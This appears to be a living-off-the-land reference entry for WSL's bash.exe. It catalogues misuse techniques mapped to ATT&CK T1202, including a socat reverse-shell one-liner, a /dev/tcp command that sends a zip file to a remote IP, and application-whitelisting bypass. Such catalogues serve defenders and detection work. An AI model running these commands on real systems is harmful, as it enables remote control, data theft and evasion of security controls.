File used by Windows subsystem for Linux
Paths:
- C:\Windows\System32\bash.exe
- C:\Windows\SysWOW64\bash.exe
Execute
-
Executes executable from bash.exe
bash.exe -c "{CMD}"
- Use case
- Performs execution of specified file, can be used as a defensive evasion.
- Privileges required
- User
- Operating systems
- Windows 10
- ATT&CK® technique
- T1202
- Tags
Execute: CMD
-
Executes a reverse shell
bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
- Use case
- Performs execution of specified file, can be used as a defensive evasion.
- Privileges required
- User
- Operating systems
- Windows 10
- ATT&CK® technique
- T1202
- Tags
Execute: CMD
-
Exfiltrate data
bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
- Use case
- Performs execution of specified file, can be used as a defensive evasion.
- Privileges required
- User
- Operating systems
- Windows 10
- ATT&CK® technique
- T1202
- Tags
Execute: CMD
AWL bypass
-
Executes executable from bash.exe
bash.exe -c "{CMD}"
- Use case
- Performs execution of specified file, can be used to bypass Application Whitelisting.
- Privileges required
- User
- Operating systems
- Windows 10
- ATT&CK® technique
- T1202
- Tags
Execute: CMD